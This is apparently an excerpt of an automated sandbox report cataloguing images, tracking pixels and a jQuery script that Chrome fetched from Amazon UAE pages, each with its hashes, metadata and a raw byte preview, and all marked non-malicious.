                                                                                                                                                                                                                                                                Preview:......JFIF..............Exif..II*...............4IJP........4?jumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:30e8ecf4-3ac9-4de5-bb55-b713f6cf7836.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Kdnamenjumbf manifestcalgfsha256dhashX ....7..:.a4.~I..Y*..."u.B...-..cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:A4DEEE94472B11EF8FE8FE57D3F77758oclaim_generatorx7Adobe_Photoshop/25.12.0 adobe_c2pa/0.9.3 c2pa-rs/0.31.0tclaim_generator_info..dnameoAdobe Photoshopgversiong25.12.0.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX J
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 306x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):16961
                                                                                                                                                                                                                                                                Entropy (8bit):7.944144237250743
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:lFmPFfI+FnjMFOZPXHunsX9XcqLYIQ3ANjvyxU2JMmr:ydQ+NOi/OIcqsIQ3AAxU2JMmr
                                                                                                                                                                                                                                                                MD5:595D46FC2E027AA73777D6F1A4C0666D
                                                                                                                                                                                                                                                                SHA1:06DF29CA0F22B6618500B4C21D43C790105D0FE6
                                                                                                                                                                                                                                                                SHA-256:8FE8CEE6D7296BB28158826CA3EA5D4E48DD940B6FE25769E69B828D12F8B3A5
                                                                                                                                                                                                                                                                SHA-512:7E6629ECC19FA3380E57F9AF620D89E6FC72C281B31D95F4300AAF981914E109903FF3527BC61C69C3C4D33F114F20B28F652D53CABF4BBD27E3F2F468E4F8F9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/81SRiWX-rcL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........2.."..........4.................................................................\\.1..-.X...y...G.U.0>.7.....@.j...)Qfq\..E...e+..........{;VY.K....>..l..........vlk.....h|.N.....y.w.j....n.h..2..wd.u..ld.....R......n..k.W,~...g..............w.%..&:8.i.#..&...t......]..x.?....k..`.].c7#..{a..GH....h..:S.*..J.@..m.82........u..a.Gz~(..Qv.{F...I\.C-.p.=....&.4.....t.U..j......Z.{..0......+.+..........<...V.=h..b.^3.....^....Z.S:..d.....7s4..2.5..Fn....qH.)....;.....1n...c-...."..S....i3...!P.....;3..Xu....3...1..3..!.x.FKU....B...>....XK..>...}.9&..........;.....;>..Y.....s-.1......m..)*.=?.m.rpj....gf..c}.d.(...N#...g..<..A...s.L.......dxl.J.P.z......cX..y........p...En..\f.Q.UZ....G.....N..2.,.VdZ.#..m..|..&._.m..Tk.....Z@.."4.7.0.JWT.}....<.yx.a.p...}...w..8X)..k..)..1.z....4.&k.6
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2323
                                                                                                                                                                                                                                                                Entropy (8bit):7.527203549278081
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rCOtymtswBJ9jOOYvcIyca+R09tS3W31cHKpiwU0XpnbzYwZ:T7OtBtTv9jwRyl8A1cHKtUknfJ
                                                                                                                                                                                                                                                                MD5:B913C52195D6CCF053E4B4269DF7EEAA
                                                                                                                                                                                                                                                                SHA1:5325FDA4A6696F2CE45617609C8AA2F3A5A5FDB7
                                                                                                                                                                                                                                                                SHA-256:6B7BB7EAF34F5C11DFA46FA4855D6C39C4AA7C5959142471D0FA7C6DEC6CC3D9
                                                                                                                                                                                                                                                                SHA-512:A88AE5A6B9BA867DD2F9C8E5D355FF3D381E444610A28C84C6C28CDFF3A9C0DBD0477858DC3E0BA4218AB37291ED404C7E1520CD27F613955FB2E13FB8E910EE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!...."1Aq#2BQ....Ra....S..$%b3cdrst....................................................?..........'5..&.]..H.~U.z.....4-.t...z.j.6k].7@...WD..-..G.g.k.......b.&^......4.'2...d..}.NNs..s.J=.X..i.N..........f.....sqs2...T.\...Ot..I.....1....f^L+-...F....\....Nq.......z....~\v.KIK".0^..{..tdy..f>H.&..h..4..a..O..._....=.A.3hjV..U..iy..G..3.>U.wC#..Ul.f.I.k.Q.H...O/Yw..i:.V+.^g...V.]...(...k.e...................QM.......pkg.'.4.S_8.j$Y..-gU..}../.}......-E.!".Y4Y.......b...x6..R2..:c&../.:.c.`.j...p.DRd....&....9..r+JGy2.2..{....)...pjr.o..f....j..u.<.=.....M...(8.j..K......................k.....?.......<...l...W....>qdz.{.}........wD."D..x...:..?..M\eZ{......0M..U?....OdejI.\.~..H..!d. .....n?.......Q~....:........Z.qJ,...y.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3Daui%3Asw%3Actrl_changed%26bb0%3D1293%26pc0%3D42981%26ld0%3D42981%26t0%3D1723469045979%26csmtags%3Daui%3Asw%3Actrl_changed%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:42980
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 185x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5555
                                                                                                                                                                                                                                                                Entropy (8bit):7.935777603305636
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TigeS4+q+47NeEWf5xt5HLFnh20+bJDgf1d55+ExC8skE8Z4R4mT/6A:oS4+KeEinz1hSDi1Rp3E8+4mb6A
                                                                                                                                                                                                                                                                MD5:F610742612EE519554CF746DE4175D66
                                                                                                                                                                                                                                                                SHA1:76B8FF42A86EC595621DF9CE16CCB6FC69A81CFF
                                                                                                                                                                                                                                                                SHA-256:0C8D0AE21F7C04C408123299877DBF71AEF09EF9CF47A46D5DF24AB47A6E3A3A
                                                                                                                                                                                                                                                                SHA-512:DE433E2BCF1BC0CF37F7ACB0B52805FBE3A17E25687BE979028751C017619D04AB09E42359EECDC7DEC503F2AC71849C37E6B05ECE28644D828261715C5ED1C5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..AQaqr...."25st46BDRb.......#$%3........CE....STU...d..................................................!1A..2QR."Bar...#...............?...C...p._QY3 ..d..6.w....f....gVbU.. m..;CX.w=.....c...P0.7.:...oA.....e.9j.<:.w....y}.....F..$7@.3..YM=...d.2.f...s.<.=.M...u..(..m.@{.e.......t.K:-..R...3cv....."z..3/..+..-.eUX88x.F..9h..--..O..^...N...'...S..*kl..,..n.W.;.p~.V._...m|...._6..?*.......m.O6..C.P.u..p0...>.E...'..?]H....k..L...?uLg..Q.....K..d..u0..BA.K)*..Q.KD.s#.$L..#7;.......Ts.~n4....'.n......_..f.3..>Y.{pn.H..Ir.|.......L..Lc.s...vp......8.....)..(...?H>#x.c.SBx.Y.*.;...y{u|W..8.g...*.hmc=,:.'I.$q8...f.+3De.*.8.SA....m#:..J ..9.u..q..^.#.dL'.'...&....1......8..e...Z..1..6.0r.4+V......-...h.a..T.Q...n.n.......#..b....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2132
                                                                                                                                                                                                                                                                Entropy (8bit):7.754854253062559
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rVLPMNn4fEYWfsmojwRTt04o5LW4PA+YmDNv55/uybbsA8:TEfqfwst04o444+YmDBK
                                                                                                                                                                                                                                                                MD5:42E5B8A2E632B2CD6F4EF7B2163CAB99
                                                                                                                                                                                                                                                                SHA1:95984EC0C369FD16EE0A6120AB8D1551060ADFEC
                                                                                                                                                                                                                                                                SHA-256:D027D4A2602C1A135247F7864B96CC2FA6FC743AEEAD6119E6B85B7B46AFC93C
                                                                                                                                                                                                                                                                SHA-512:8D8B1FC4682151497CD7AA02047D92B20DCB3370FA1B814F37C6AAD99B0024A82C5390B17912BCF527A575F0AF42D9A3B74734E53A0073645E13FF5A6279A4D8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1A..Qa."...#2q....$Rbt...............................................!1.A.."2............?...D@...DD.J*....L.u..1.o...W.X=Q./.(.......2..W?..E.h..+.*c...,N<....:u?f..fN.K..^...E.rpB" ...""...." .B.(.oW_[b.U...n...p...m._....L...VW.z....|..V...f.K%F@.H&'K..v#..f...r.b...ed1......#].6X...$.s.lE..<.O....8`$....2....K.5U......X..[..$5N.i.:..e..7+q.....=.U.k..B.=.q.dpc.9.-.<.+`....d.R.tp...DD....D@.......5....0\.e.%.E..Q].......J.|.l...w/....B_...}4.5.-......<<.Q..u.....#h.2Z...*.(ie....q'..B..eg..g~.~......_.M...c../..4r.ER..rT.I.G0?6.x..o...s.[.$.o.o..v...<LY..h../.u.tT.A..c.>..{>u...DE..DD....D@...!HE.U.i...$.m..9#...]..7..1....$.l1R<..%.{.a.mp......s.z.M]......Be{....0:.....zK{....,.....X.K..*|I.{,...c..>_8....5..4..)%....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):66043
                                                                                                                                                                                                                                                                Entropy (8bit):7.92587183958159
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:gvohywJnc2V+JEXekAqophXVodZub6entbv2LkDUMGKdttS7:+VwJ3V+yXekhophXVodZubtxvvUMG0tU
                                                                                                                                                                                                                                                                MD5:F6C51378C8351ABB9C8902B47303D022
                                                                                                                                                                                                                                                                SHA1:DE358D6C3A83E82443E4B3C5B0AC9AA8BFAD22FB
                                                                                                                                                                                                                                                                SHA-256:66C0EB40C7FDB190B6E00AC99DE773A7F8461B4E8585E8522042A5B0644F8500
                                                                                                                                                                                                                                                                SHA-512:39790AB8AAFD0261C48FE0D360907BAED683046396ADCA2B0A9F5784D5DC1F14944820A31AFFF41C1DBF8D77FB2542C3A1E977F262747DAF7481E1C016073735
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61JiCrojGSL._SX1500_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..............Exif..II*.................Ducky.......0......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a5ecbaa6-ca8a-48b3-9ab9-0568866a55c5" xmpMM:DocumentID="xmp.did:3C95DCF94C1511EF856A94285C069192" xmpMM:InstanceID="xmp.iid:3C95DCF84C1511EF856A94285C069192" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:436fb9fc-aa5c-4a95-a409-6aae293d594f" stRef:documentID="adobe:docid:photoshop:e65d89a6-917f-e949-b271-9d2c7c650dc3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..........
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):317121
                                                                                                                                                                                                                                                                Entropy (8bit):5.382549810640479
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:xYcQZMuZ7q9P1+pKbaMKNwCe3DNEz7+OeQm81AWWwIty8cIQygwYvsjfq08:xYXUMKbaMKaC3m81bVItyb5wYUrq08
                                                                                                                                                                                                                                                                MD5:EDA8128C6BF3EBC56B6C8687CD5C8C74
                                                                                                                                                                                                                                                                SHA1:6AC6DDF899CFDCCF21D5D473FF96029EFEA4D2B5
                                                                                                                                                                                                                                                                SHA-256:F096709892C962D8E2C2E5A886DA566F5FF23095E0BA1D49CEFCD5F80B6459B5
                                                                                                                                                                                                                                                                SHA-512:4635AB9CDE70878F17B6A2975154233FF99B44FC965B01805CCD3E6DA888F3B47FFA9E1FD5BF6D0C644C95317FB62CD93F47C4BFCCC153ADDDAFEBEFFB54B9A7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):13218
                                                                                                                                                                                                                                                                Entropy (8bit):7.864034228159954
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:E++Fig5KfN74L1XzqzZgJXZiWGqG2KxKne1YxBU7YlpWnFGes8T8squWESbljEi2:7+04xXVX8YrBUMbUFGes8osquaowQ5EY
                                                                                                                                                                                                                                                                MD5:EFFFF114D0586635AFBBA9DF43E7CB5B
                                                                                                                                                                                                                                                                SHA1:77B21281CCA6A50FB939E2D58D82A626A88E4CBA
                                                                                                                                                                                                                                                                SHA-256:CA262FCFBCE803D40BBA897B0DB44BA02454A6ADE29CB98279BDC5D1EF77558F
                                                                                                                                                                                                                                                                SHA-512:D3B4EE80987D0B8311652F7C9E3068157E351EFAC356FF3B2B0485C905296E07AE04D8327468CF95885D2278BCA9EBE6161D0E6A9C2B3DB0BAD29EA9B2269C8A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/S/sash/MV5yNztdnPUc5FB.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............$....8PLTEGpL.y!.y!.y!.z".y!..%.:.o<..z".{#....^.J....z .......y!....z!.y!.....z"......ossnrrQegJNNAKLIMM[^_JNNIMM....tP.........OSS..........GLMJNNBFFJNNJNNINN...JOP...JNN...~.....JNNIMM...IMM...................x..~.pss.q...........y!.{".z!...z".........z"..&......G..C...y!.y"..8.z!.y..:..9..9..._.L6.....}b.......htRNS.?.. .....o..........`...Q....>. ..............Kt............^..................w...H.f.................s....1.IDATx...E..0.CQS.a...s.Q.....hW...i.....B....5....;`...6......w.{.....:......x......5.x...J.R.f!..)...i.<.\$-..M.)...i.<T".8....5.x.4.NDB..u..#...6.B+V;+%.._......D.Ke....o.{E.1.<.M.G......4.......u..p...4'..p.....416$8q...)...B...B..C .R.K.~...G.=H..._.3......AS..o..8Bi....KW.s...Ei).~f...I..I.g......w.z.......i.k..,......h,......>.2.~....}iT..}*)..-......Os..S&..P{i..(8.Z....$.8....YJ...+.K/5......."...}:P...P{....g...4#.|.3v`..SHruI.PA..C~~.6..).Z].S*(..pDw.....q........D..ZY...,....\..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2467
                                                                                                                                                                                                                                                                Entropy (8bit):7.733842261280018
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6+hW4l5RsnbgZ8+P6zs7b7d3K4HkRyhVsxY7oZe5EbWl7qI:T54lWg++Pt7b7xkWjeK2I
                                                                                                                                                                                                                                                                MD5:B96056A01B73CB6077E417EAF6D4E3C3
                                                                                                                                                                                                                                                                SHA1:A460E89AD61BC1AACB66771C02C9ED8405D54B39
                                                                                                                                                                                                                                                                SHA-256:3C6E6089DD0486B2734E86E306E1E944B76A0E76FFE32D8C2669E6614C75A609
                                                                                                                                                                                                                                                                SHA-512:D2C3D315F2F139DB1FB6BBB8833C349008851DA9B28DD1D0410CA815B3E0A4F500EB59485D8CFA7B8CCF6E2B7D8FBEB2D11E7FE29BB98FA956CA9023AE6A3A5C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-vubbe_372x232_ae-en._SY116_CB643136714_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1.ABQq..."2a...#R........3Sb..................................................!.2"q1AQ............?..TD@...DD....M*....'%........r......a9....D.::....0d.........>...6."H...DD....D@...DD....D@...._.J..H..#.q..qn.......... .h*|..>G...82t..l<.....qix.....w..<.kF..D....F...n+.....iF..J.;.<..........=.2?..yj.L...j.#..0.J..e6.{..p.V........D.{.....]...H..#.0....CH0,..8....9.eka.[...U...SfM'...}.Y9..0..Y*Z....H...DD....D@...@..U.7.l.oD...>..x.'.G#.s.6?h.w....}$...a.?_3$.vm...za.|U....a..V-...W.....Fb.}19U<.?.q7.P../.b.}N....2....V.N..31...(..V......H.ed.J.j\..*..8../w!S.)~.WO.X..f...R.$w...;... ....:..0.Z,..J.........Z...z..uh.l.q.....56#..Lg....~.c...>.u............G.C..Q~.A.O..F.x6..F.j..h'.M.t..;.y.j).U........I..rc..Fg/..W(E.h.l..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3Asi%26si%3D3567%26pc%3D7461%26at%3D7461%26t%3D1723469074827%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:7461
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2354
                                                                                                                                                                                                                                                                Entropy (8bit):7.7983762557864855
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r8ugddGbnVg5drcspO38av1A43N+klwuwmpCVBo:Tj1rcspOMb433P1iBo
                                                                                                                                                                                                                                                                MD5:8E65C5BF438DA029BEED5759985ED82F
                                                                                                                                                                                                                                                                SHA1:47C01210115A756F85B952564D2AF49FC170DB10
